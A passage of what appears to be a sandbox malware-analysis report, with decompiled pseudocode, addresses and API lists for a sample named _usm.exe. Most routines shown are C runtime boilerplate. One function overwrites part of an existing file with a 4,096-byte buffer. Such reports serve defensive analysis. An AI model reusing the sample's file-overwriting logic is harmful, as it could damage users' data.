							 *((char*)(_t62 + 0x149540)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
							_t62 = _t62 + 1;
						}
						_t63 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t63;
							__eflags = _t63 - 0x100;
							if(_t63 >= 0x100) {
								break;
							}
							 *((char*)(_t63 + 0x149648)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
							_t63 = _t63 + 1;
						}
						_t64 = InterlockedDecrement( *0x149748);
						__eflags = _t64;
						if(_t64 == 0) {
							_t67 =  *0x149748; // 0x12c16b0
							__eflags = _t67 - 0x149320;
							if(_t67 != 0x149320) {
								E001443CF(_t67);
							}
						}
						 *0x149748 = _t73;
						InterlockedIncrement(_t73);
						 *(_t98 - 4) = 0xfffffffe;
						E00144378();
					}
				}
			}















    0x00144217
    0x00144217
    0x00144217
    0x00144219
    0x0014421e
    0x00144223
    0x0014422c
    0x0014422e
    0x00144231
    0x0014423c
    0x00144241
    0x00144247
    0x001443a4
    0x001443a4
    0x001443a4
    0x001443a8
    0x001443b0
    0x001443b0
    0x00144258
    0x0014425a
    0x0014425c
    0x00000000
    0x00000000
    0x0014426c
    0x0014426e
    0x00144275
    0x0014427c
    0x00144281
    0x00144383
    0x00144386
    0x00144388
    0x0014438e
    0x00144391
    0x00144396
    0x0014439c
    0x0014439c
    0x00144287
    0x00144287
    0x00144295
    0x00144297
    0x0014429f
    0x001442a2
    0x001442a7
    0x0014429f
    0x001442a8
    0x001442b2
    0x001442b8
    0x001442cd
    0x001442d3
    0x001442da
    0x001442e2
    0x001442ea
    0x001442ef
    0x001442f1
    0x001442f1
    0x001442f7
    0x00000000
    0x00000000
    0x001442fe
    0x00144306
    0x00144306
    0x00144309
    0x00144309
    0x0014430b
    0x0014430b
    0x0014430e
    0x00144313
    0x00000000
    0x00000000
    0x00144319
    0x0014431f
    0x0014431f
    0x00144322
    0x00144322
    0x00144324
    0x00144324
    0x00144327
    0x0014432c
    0x00000000
    0x00000000
    0x00144335
    0x0014433b
    0x0014433b
    0x00144344
    0x0014434a
    0x0014434c
    0x0014434e
    0x00144353
    0x00144358
    0x0014435b
    0x00144360
    0x00144358
    0x00144361
    0x00144368
    0x0014436a
    0x00144371
    0x00144371
    0x001442b8

    APIs
    • __getptd.LIBCMT ref: 00144227
      • Part of subcall function 0014299A: __amsg_exit.LIBCMT ref: 001429AA
      • Part of subcall function 00143F0B: __getptd.LIBCMT ref: 00143F17
      • Part of subcall function 00143F0B: __amsg_exit.LIBCMT ref: 00143F37
      • Part of subcall function 00143F0B: InterlockedDecrement.KERNEL32(?), ref: 00143F64
      • Part of subcall function 00143F0B: InterlockedIncrement.KERNEL32(012C16B0), ref: 00143F8F
      • Part of subcall function 00143FB2: GetOEMCP.KERNEL32(00000000,?), ref: 00143FDB
      • Part of subcall function 00143FB2: GetACP.KERNEL32(00000000,?), ref: 00143FFE
      • Part of subcall function 00144468: Sleep.KERNEL32(00000000,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1,?,?,?,001428B7,0000000D,?,00141E3B), ref: 00144489
      • Part of subcall function 0014402E: setSBCS.LIBCMT ref: 0014405B
      • Part of subcall function 0014402E: IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 001440A1
      • Part of subcall function 0014402E: GetCPInfo.KERNEL32(00000000,?), ref: 001440B4
      • Part of subcall function 0014402E: setSBUpLow.LIBCMT ref: 001441A2
    • InterlockedDecrement.KERNEL32(?), ref: 0014428D
    • InterlockedIncrement.KERNEL32(00000000), ref: 001442B2
      • Part of subcall function 001430D6: __amsg_exit.LIBCMT ref: 001430F8
      • Part of subcall function 001430D6: EnterCriticalSection.KERNEL32(?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00143100
    • InterlockedDecrement.KERNEL32 ref: 00144344
    • InterlockedIncrement.KERNEL32(00000000), ref: 00144368
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00141C32, Relevance: 7.6, APIs: 5, Instructions: 98
    C-Code - Quality: 24%
    			E00141C32(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				intOrPtr* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr* _t53;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				_push(0x20);
				_push(0x147bc0);
				E00142C80(__ebx, __edi, __esi);
				E001430D6(__ebx, __edi, 8);
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				_t58 =  *0x149e84 - 1; // 0x0
				if(_t58 != 0) {
					 *0x149e80 = 1;
					_t34 =  *((intOrPtr*)(_t56 + 0x10));
					 *0x149e7c =  *((intOrPtr*)(_t56 + 0x10));
					if( *((intOrPtr*)(_t56 + 0xc)) == 0) {
						_t55 = __imp__DecodePointer;
						_t34 =  *_t55( *0x14a8a8);
						_t45 = 1;
						 *((intOrPtr*)(_t56 - 0x30)) = 1;
						if(1 != 0) {
							_t34 =  *_t55( *0x14a8a4);
							_t53 = 1;
							 *((intOrPtr*)(_t56 - 0x2c)) = 1;
							 *((intOrPtr*)(_t56 - 0x24)) = 1;
							 *((intOrPtr*)(_t56 - 0x28)) = 1;
							while(1) {
								_t53 = _t53 - 4;
								 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
								if(_t53 < _t45) {
									goto L11;
								}
								if( *_t53 == _t34) {
									continue;
								} else {
									if(_t53 >= _t45) {
										_t40 =  *_t55( *_t53);
										 *_t53 = E001427EA(_t40);
										 *_t40();
										_t47 =  *_t55( *0x14a8a8);
										_t34 =  *_t55( *0x14a8a4);
										if( *((intOrPtr*)(_t56 - 0x24)) != _t47 ||  *((intOrPtr*)(_t56 - 0x28)) != _t34) {
											 *((intOrPtr*)(_t56 - 0x24)) = _t47;
											 *((intOrPtr*)(_t56 - 0x30)) = _t47;
											 *((intOrPtr*)(_t56 - 0x28)) = _t34;
											_t53 = _t34;
											 *((intOrPtr*)(_t56 - 0x2c)) = _t53;
										}
										_t45 =  *((intOrPtr*)(_t56 - 0x30));
										continue;
									}
								}
								goto L11;
							}
						}
						L11:
						 *((intOrPtr*)(_t56 - 0x1c)) = 0x1461a8;
						while( *((intOrPtr*)(_t56 - 0x1c)) < 0x1461ac) {
							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x1c))));
							if(_t34 != 0) {
								_t34 =  *_t34();
							}
							 *((intOrPtr*)(_t56 - 0x1c)) =  *((intOrPtr*)(_t56 - 0x1c)) + 4;
						}
					}
					 *((intOrPtr*)(_t56 - 0x20)) = 0x1461b0;
					while( *((intOrPtr*)(_t56 - 0x20)) < 0x1461b4) {
						_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x20))));
						if(_t34 != 0) {
							_t34 =  *_t34();
						}
						 *((intOrPtr*)(_t56 - 0x20)) =  *((intOrPtr*)(_t56 - 0x20)) + 4;
					}
				}
				 *(_t56 - 4) = 0xfffffffe;
				L23();
				if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
					return E00142CC5(_t34);
				} else {
					 *0x149e84 = 1;
					_t36 = E00142FFD(8);
					E00141B1A( *((intOrPtr*)(_t56 + 8)));
					if( *((intOrPtr*)(_t56 + 0x10)) != 0) {
						return E00142FFD(8);
					}
					return _t36;
				}
			}











    0x00141c32
    0x00141c34
    0x00141c39
    0x00141c40
    0x00141c46
    0x00141c4d
    0x00141c53
    0x00141c59
    0x00141c5e
    0x00141c61
    0x00141c6a
    0x00141c76
    0x00141c7c
    0x00141c7e
    0x00141c80
    0x00141c85
    0x00141c8d
    0x00141c8f
    0x00141c91
    0x00141c94
    0x00141c97
    0x00141c9a
    0x00141c9a
    0x00141c9d
    0x00141ca2
    0x00000000
    0x00000000
    0x00141cab
    0x00000000
    0x00141cad
    0x00141caf
    0x00141cb3
    0x00141cbc
    0x00141cbe
    0x00141cc8
    0x00141cd0
    0x00141cd5
    0x00141cdc
    0x00141cdf
    0x00141ce2
    0x00141ce5
    0x00141ce7
    0x00141ce7
    0x00141cea
    0x00000000
    0x00141cea
    0x00141caf
    0x00000000
    0x00141cab
    0x00141c9a
    0x00141cef
    0x00141cef
    0x00141cf6
    0x00141d02
    0x00141d06
    0x00141d08
    0x00141d08
    0x00141d0a
    0x00141d0a
    0x00141cf6
    0x00141d10
    0x00141d17
    0x00141d23
    0x00141d27
    0x00141d29
    0x00141d29
    0x00141d2b
    0x00141d2b
    0x00141d17
    0x00141d31
    0x00141d38
    0x00141d41
    0x00141d71
    0x00141d43
    0x00141d43
    0x00141d4f
    0x00141d58
    0x00141d61
    0x00000000
    0x00141d6a
    0x00141d6b
    0x00141d6b

    APIs
      • Part of subcall function 001430D6: __amsg_exit.LIBCMT ref: 001430F8
      • Part of subcall function 001430D6: EnterCriticalSection.KERNEL32(?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00143100
    • DecodePointer.KERNEL32(00147BC0,00000020,00141D99,?,00000001,00000000,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D), ref: 00141C7C
    • DecodePointer.KERNEL32(?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00141C8D
      • Part of subcall function 001427EA: EncodePointer.KERNEL32(00000000,00141CA9,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 001427EC
    • DecodePointer.KERNEL32(-00000004,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00141CB3
    • DecodePointer.KERNEL32(?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00141CC6
    • DecodePointer.KERNEL32(?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00141CD0
      • Part of subcall function 00142FFD: LeaveCriticalSection.KERNEL32(?,001430D4,0000000A,001430C4,00147C50,0000000C,001430F1,?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 0014300C
      • Part of subcall function 00141B1A: ExitProcess.KERNEL32 ref: 00141B2B
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 001424C2, Relevance: 7.6, APIs: 5, Instructions: 72
    C-Code - Quality: 100%
    			E001424C2() {
				int _v8;
				int _v12;
				int _v16;
				WCHAR* _t9;
				int _t12;
				int _t13;
				char* _t15;
				char* _t16;
				WCHAR* _t21;

				_t9 = GetEnvironmentStringsW();
				_t21 = _t9;
				if(_t21 != 0) {
					if( *_t21 == 0) {
						L5:
						_t12 = (_t9 - _t21 >> 1) + 1;
						_v16 = _t12;
						_t13 = WideCharToMultiByte(0, 0, _t21, _t12, 0, 0, 0, 0);
						_v12 = _t13;
						if(_t13 == 0) {
							L10:
							FreeEnvironmentStringsW(_t21);
							_t15 = 0;
							L11:
							return _t15;
						}
						_t16 = E00144468(_t13);
						_v8 = _t16;
						if(_t16 == 0) {
							goto L10;
						}
						if(WideCharToMultiByte(0, 0, _t21, _v16, _t16, _v12, 0, 0) == 0) {
							E001443CF(_v8);
							_v8 = 0;
						}
						FreeEnvironmentStringsW(_t21);
						_t15 = _v8;
						goto L11;
					} else {
						goto L3;
					}
					do {
						do {
							L3:
							_t9 =  &(_t9[1]);
						} while ( *_t9 != 0);
						_t9 =  &(_t9[1]);
					} while ( *_t9 != 0);
					goto L5;
				}
				return 0;
			}












    0x001424cc
    0x001424d2
    0x001424d8
    0x001424e1
    0x001424f3
    0x00142502
    0x00142507
    0x0014250a
    0x0014250c
    0x00142511
    0x0014254b
    0x0014254c
    0x00142552
    0x00142554
    0x00000000
    0x00142554
    0x00142514
    0x0014251a
    0x0014251f
    0x00000000
    0x00000000
    0x00142531
    0x00142536
    0x0014253c
    0x0014253c
    0x00142540
    0x00142546
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001424e3
    0x001424e3
    0x001424e3
    0x001424e3
    0x001424e6
    0x001424eb
    0x001424ee
    0x00000000
    0x001424e3
    0x00000000

    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 001424CC
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0014250A
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0014254C
      • Part of subcall function 00144468: Sleep.KERNEL32(00000000,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1,?,?,?,001428B7,0000000D,?,00141E3B), ref: 00144489
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0014252D
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00142540
      • Part of subcall function 001443CF: HeapFree.KERNEL32(00000000,00000000), ref: 001443E5
      • Part of subcall function 001443CF: GetLastError.KERNEL32(00000000,?,0014298B,00000000,?,00141E3B,00000003), ref: 001443F7
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142E6F, Relevance: 7.6, APIs: 5, Instructions: 54timethread
    C-Code - Quality: 100%
    			E00142E6F() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t25;
				signed int _t34;

				_t14 =  *0x149004; // 0x20251455
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t34 != 0xbb40e64e) {
						if((0xffff0000 & _t34) == 0) {
							_t22 = (_t34 | 0x00004711) << 0x10;
							_t34 = _t34 | _t22;
						}
					} else {
						_t34 = 0xbb40e64f;
					}
					 *0x149004 = _t34;
					 *0x149008 =  !_t34;
					return _t22;
				} else {
					_t25 =  !_t14;
					 *0x149008 = _t25;
					return _t25;
				}
			}













    0x00142e77
    0x00142e7c
    0x00142e80
    0x00142e92
    0x00142ea6
    0x00142eb2
    0x00142eba
    0x00142ec2
    0x00142ece
    0x00142ed7
    0x00142eda
    0x00142ede
    0x00142ee9
    0x00142ef2
    0x00142ef5
    0x00142ef5
    0x00142ee0
    0x00142ee0
    0x00142ee0
    0x00142ef7
    0x00142eff
    0x00000000
    0x00142e98
    0x00142e98
    0x00142e9a
    0x00000000
    0x00142e9a

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00142EA6
    • GetCurrentProcessId.KERNEL32 ref: 00142EB2
    • GetCurrentThreadId.KERNEL32 ref: 00142EBA
    • GetTickCount.KERNEL32 ref: 00142EC2
    • QueryPerformanceCounter.KERNEL32(?), ref: 00142ECE
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 001410F5, Relevance: 7.5, APIs: 5, Instructions: 49file
    C-Code - Quality: 95%
    			E001410F5(intOrPtr __ebx, intOrPtr __edx, WCHAR* _a4) {
				signed int _v8;
				void _v4104;
				long _v4108;
				void* __edi;
				void* __esi;
				signed int _t9;
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t23;
				signed int _t25;

				_t22 = __edx;
				_t19 = __ebx;
				E00145B90(0x1008);
				_t9 =  *0x149004; // 0x20251455
				_v8 = _t9 ^ _t25;
				_v4108 = 0;
				_t23 = CreateFileW(_a4, 0x40000000, 0, 0, 3, 0x80, 0);
				if(_t23 != 0xffffffff) {
					SetFilePointer(_t23, 0xffffffff, 0, 0);
					if(WriteFile(_t23,  &_v4104, 0x1000,  &_v4108, 0) != 0) {
						FlushFileBuffers(_t23);
					}
					_t12 = CloseHandle(_t23);
				}
				return E001417EA(_t12, _t19, _v8 ^ _t25, _t22, _t23, 0);
			}













    0x001410f5
    0x001410f5
    0x001410fd
    0x00141102
    0x00141109
    0x00141123
    0x0014112f
    0x00141134
    0x0014113b
    0x0014115e
    0x00141161
    0x00141161
    0x00141168
    0x00141168
    0x0014117b

    APIs
    • CreateFileW.KERNEL32(00141576,40000000,00000000,00000000,00000003,00000080,00000000), ref: 00141129
    • SetFilePointer.KERNEL32(00000000,000000FF,00000000,00000000,?,00141576,?), ref: 0014113B
    • WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 00141156
    • FlushFileBuffers.KERNEL32(00000000), ref: 00141161
    • CloseHandle.KERNEL32(00000000), ref: 00141168
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142407, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
    C-Code - Quality: 96%
    			E00142407(void* __ecx) {
				CHAR* _v8;
				signed int _v12;
				char _v16;
				void* __edi;
				intOrPtr* _t14;
				signed int _t17;
				char _t27;
				void* _t28;
				signed int _t37;
				intOrPtr _t41;

				_t26 = __ecx;
				_t41 =  *0x14a8ac; // 0x1
				if(_t41 == 0) {
					E001443B1(__ecx);
				}
				 *0x14a5b4 = 0;
				GetModuleFileNameA(0, 0x14a4b0, 0x104);
				_t14 =  *0x14a8b8; // 0x2c1ed8
				 *0x149e74 = 0x14a4b0;
				if(_t14 == 0) {
					L4:
					_v8 = 0x14a4b0;
					goto L5;
				} else {
					_v8 = _t14;
					if( *_t14 != 0) {
						L5:
						E0014226D(_t26, _v8,  &_v16, 0, 0,  &_v12);
						_t17 = _v12;
						if(_t17 >= 0x3fffffff) {
							L10:
							return _t17 | 0xffffffff;
						}
						_t27 = _v16;
						if(_t27 >= 0xffffffff) {
							goto L10;
						}
						_t33 = _t17 << 2;
						_t17 = (_t17 << 2) + _t27;
						if(_t17 < _t27) {
							goto L10;
						}
						_t17 = E00144468(_t17);
						_t37 = _t17;
						_pop(_t28);
						if(_t37 == 0) {
							goto L10;
						}
						E0014226D(_t28, _v8,  &_v16, _t37, _t33 + _t37,  &_v12);
						 *0x149e58 = _v12 - 1;
						 *0x149e5c = _t37;
						return 0;
					}
					goto L4;
				}
			}













    0x00142407
    0x00142414
    0x0014241a
    0x0014241c
    0x0014241c
    0x0014242d
    0x00142433
    0x00142439
    0x0014243e
    0x00142446
    0x0014244f
    0x0014244f
    0x00000000
    0x00142448
    0x00142448
    0x0014244d
    0x00142452
    0x0014245e
    0x00142463
    0x0014246e
    0x001424ba
    0x00000000
    0x001424ba
    0x00142470
    0x00142476
    0x00000000
    0x00000000
    0x0014247a
    0x0014247d
    0x00142482
    0x00000000
    0x00000000
    0x00142485
    0x0014248a
    0x0014248c
    0x0014248f
    0x00000000
    0x00000000
    0x0014249f
    0x001424ab
    0x001424b0
    0x00000000
    0x001424b6
    0x00000000
    0x0014244d

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe,00000104), ref: 00142433
    • _parse_cmdline.LIBCMT ref: 0014245E
      • Part of subcall function 00144468: Sleep.KERNEL32(00000000,00000001,?,?,00143061,00000018,00147C50,0000000C,001430F1,?,?,?,001428B7,0000000D,?,00141E3B), ref: 00144489
    • _parse_cmdline.LIBCMT ref: 0014249F
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00141AEF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16library
    C-Code - Quality: 100%
    			E00141AEF(intOrPtr _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleW(L"mscoree.dll");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "CorExitProcess");
					if(_t2 != 0) {
						return _t2->i(_a4);
					}
				}
				return _t2;
			}




    0x00141af9
    0x00141b01
    0x00141b09
    0x00141b11
    0x00000000
    0x00141b16
    0x00141b11
    0x00141b19

    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,00141B27,?,?,001451D9,000000FF,0000001E,00000001,00000000,00000000,?,00144479,?,00000001,?), ref: 00141AF9
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00141B27,?,?,001451D9,000000FF,0000001E,00000001,00000000,00000000,?,00144479,?,00000001), ref: 00141B09
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 0014402E, Relevance: 6.2, APIs: 4, Instructions: 159
    C-Code - Quality: 91%
    			E0014402E(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				int _t56;
				signed char _t59;
				int _t61;
				short* _t62;
				signed int _t66;
				signed char* _t78;
				signed int _t81;
				int _t82;
				signed int _t85;
				intOrPtr* _t86;
				int _t91;
				signed char _t92;
				signed int _t93;
				int _t95;
				int _t97;
				signed int _t98;
				signed int _t101;
				intOrPtr* _t104;
				signed int _t105;

				_t53 =  *0x149004; // 0x20251455
				_v8 = _t53 ^ _t105;
				_t82 = _a8;
				_t97 = E00143FB2(_a4);
				_t100 = 0;
				_a4 = _t97;
				if(_t97 != 0) {
					_v32 = 0;
					_t56 = 0;
					__eflags = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t56 + 0x149750)) - _t97;
						if( *((intOrPtr*)(_t56 + 0x149750)) == _t97) {
							break;
						}
						_v32 = _v32 + 1;
						_t56 = _t56 + 0x30;
						__eflags = _t56 - 0xf0;
						if(_t56 < 0xf0) {
							continue;
						} else {
							__eflags = _t97 - 0xfde8;
							if(_t97 == 0xfde8) {
								L35:
								_t64 = _t56 | 0xffffffff;
								__eflags = _t56 | 0xffffffff;
							} else {
								__eflags = _t97 - 0xfde9;
								if(_t97 == 0xfde9) {
									goto L35;
								} else {
									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L35;
									} else {
										_t56 = GetCPInfo(_t97,  &_v28);
										__eflags = _t56;
										if(_t56 == 0) {
											__eflags =  *0x14a758 - _t100; // 0x0
											if(__eflags != 0) {
												goto L1;
											} else {
												goto L35;
											}
										} else {
											E00144DA0(_t82 + 0x1c, _t100, 0x101);
											_t95 = 1;
											 *(_t82 + 4) = _t97;
											 *(_t82 + 0xc) = _t100;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t82 + 8) = _t100;
											} else {
												__eflags = _v22;
												if(_v22 != 0) {
													_t104 =  &_v21;
													while(1) {
														_t92 =  *_t104;
														__eflags = _t92;
														if(_t92 == 0) {
															goto L29;
														}
														_t81 =  *(_t104 - 1) & 0x000000ff;
														_t93 = _t92 & 0x000000ff;
														while(1) {
															__eflags = _t81 - _t93;
															if(_t81 > _t93) {
																break;
															}
															 *(_t82 + _t81 + 0x1d) =  *(_t82 + _t81 + 0x1d) | 0x00000004;
															_t81 = _t81 + 1;
															__eflags = _t81;
														}
														_t104 = _t104 + 2;
														__eflags =  *(_t104 - 1);
														if( *(_t104 - 1) != 0) {
															continue;
														}
														goto L29;
													}
												}
												L29:
												_t78 = _t82 + 0x1e;
												_t91 = 0xfe;
												do {
													 *_t78 =  *_t78 | 0x00000008;
													_t78 =  &(_t78[1]);
													_t91 = _t91 - 1;
													__eflags = _t91;
												} while (_t91 != 0);
												 *(_t82 + 0xc) = E00143CE8( *(_t82 + 4));
												 *(_t82 + 8) = _t95;
											}
											_t97 = _t82 + 0x10;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L25:
											_t100 = _t82;
											E00143D7B(_t82);
											goto L2;
										}
									}
								}
							}
						}
						goto L36;
					}
					E00144DA0(_t82 + 0x1c, _t100, 0x101);
					_t85 = _v32 * 0x30;
					_v36 = _t100;
					_t101 = _t85 + 0x149760;
					_v32 = _t101;
					while(1) {
						L21:
						__eflags =  *_t101;
						if( *_t101 == 0) {
							break;
						}
						_t59 =  *(_t101 + 1);
						__eflags = _t59;
						if(_t59 != 0) {
							_t98 =  *_t101 & 0x000000ff;
							_t66 = _t59 & 0x000000ff;
							while(1) {
								__eflags = _t98 - _t66;
								if(_t98 > _t66) {
									break;
								}
								_t24 = _v36 + 0x14974c; // 0x14708800
								 *(_t82 + _t98 + 0x1d) =  *(_t82 + _t98 + 0x1d) |  *_t24;
								_t66 =  *(_t101 + 1) & 0x000000ff;
								_t98 = _t98 + 1;
								__eflags = _t98;
							}
							_t97 = _a4;
							_t101 = _t101 + 2;
							__eflags = _t101;
							continue;
						}
						break;
					}
					_v36 = _v36 + 1;
					_t101 = _v32 + 8;
					__eflags = _v36 - 4;
					_v32 = _t101;
					if(_v36 < 4) {
						goto L21;
					}
					 *(_t82 + 4) = _t97;
					 *(_t82 + 8) = 1;
					_t61 = E00143CE8(_t97);
					 *(_t82 + 0xc) = _t61;
					_t62 = _t82 + 0x10;
					_t86 = _t85 + 0x149754;
					_t95 = 6;
					do {
						 *_t62 =  *_t86;
						_t86 = _t86 + 2;
						_t62 = _t62 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L25;
				} else {
					L1:
					E00143D17(_t82);
					L2:
					_t64 = 0;
				}
				L36:
				return E001417EA(_t64, _t82, _v8 ^ _t105, _t95, _t97, _t100);
			}
































    0x00144036
    0x0014403d
    0x00144041
    0x0014404e
    0x00144050
    0x00144052
    0x00144057
    0x00144067
    0x0014406a
    0x0014406a
    0x0014406c
    0x0014406c
    0x00144072
    0x00000000
    0x00000000
    0x00144078
    0x0014407b
    0x0014407e
    0x00144083
    0x00000000
    0x00144085
    0x00144085
    0x0014408b
    0x00144205
    0x00144205
    0x00144205
    0x00144091
    0x00144091
    0x00144097
    0x00000000
    0x0014409d
    0x001440a1
    0x001440a7
    0x001440a9
    0x00000000
    0x001440af
    0x001440b4
    0x001440ba
    0x001440bc
    0x001441f9
    0x001441ff
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001440c2
    0x001440cc
    0x001440d3
    0x001440d7
    0x001440da
    0x001440dd
    0x001440e0
    0x001441e2
    0x001440e6
    0x001440e6
    0x001440ea
    0x001440f0
